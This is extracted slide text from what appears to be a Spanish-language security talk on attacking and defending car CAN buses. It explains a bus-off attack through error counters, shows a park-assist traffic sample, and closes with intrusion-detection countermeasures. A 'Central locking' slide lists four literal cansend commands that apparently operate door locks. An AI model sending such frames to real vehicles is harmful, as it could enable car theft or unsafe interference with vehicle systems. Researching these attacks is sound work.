  • 20. 20 Bus-off attack • Attack conditions –Same ID –Same time –Different data 0x107 8 0x08 0xA0 0xFE 0x04 0x80 0x00 0x00 0x04 0x107 8 0x08 0x80 0xFE 0x04 0x80 0x00 0x00 0x04 0 0 0 0 1 0 0 0 1 0 1 0 0 0 0 0 0 0 0 0 0 1 0 0 0 1 0 0 0 1 0 0 0 0 0 0 Error raised TEC1 + 8 Error raised TEC2 + 8 TEC = 128 0 0 0 0 1 0 0 0 1 0 1 0 0 0 0 1 0 0 0 1 0 0 0 1 , , , Error raised TEC1 + 8 TEC2 - 1 TEC1 = 255 Bus-off
  • 23. 23 Central locking cansend can0 184#61A40A0009000200 cansend can0 366#0010001E80030000 cansend can0 184#2F51050118000200 cansend can0 366#0010001E80030000
  • 26. 26 Park assistant • Parking operation ~ 1min – 60.000 can messages – 150 IDs ID Byte 0 Byte 1 Byte 2 Byte 3 Byte 4 Byte 5 Byte 6 Byte 7 130 EB 6A 16 00 06 00 04 80 130 8F 6B 16 00 06 00 04 80 130 9C 6C 16 00 06 00 04 80 130 CB 6D 15 00 06 00 04 80 130 01 6E 13 00 06 00 04 80 130 A2 6F 11 00 06 00 04 80 130 C5 61 0E 00 06 00 04 80
  • 33. 33 No parece que vaya a dejar de utilizarse http://eecatalog.com/automotive/2013/03/13/automotive-communication-protocols-preparing-for-the- future/
  • 34. 34 Cómo podemos protegernos • IDPS: Real Time Detection and Neutralization – CANBUS Packet Inspection – Context Analysis – Detects malicious CAN messages using ML algorithms – Zero days detection (based on behavior) – Low delay to manage the HUGE amount of data
  • 35. 35 Agradecimientos • A XXXX: por anular la garantía del coche cuando fuimos la primera vez con una ECU brickeada:
  • 36. 36
  • 37. 37 Muchas gracias Carlos Sahuquillo Pascual Automotive CyberSecurity Consultant @csahuqui on Twitter https://sahuquillo.org Igor Robles Puente Automotive CyberSecurity Research Engineer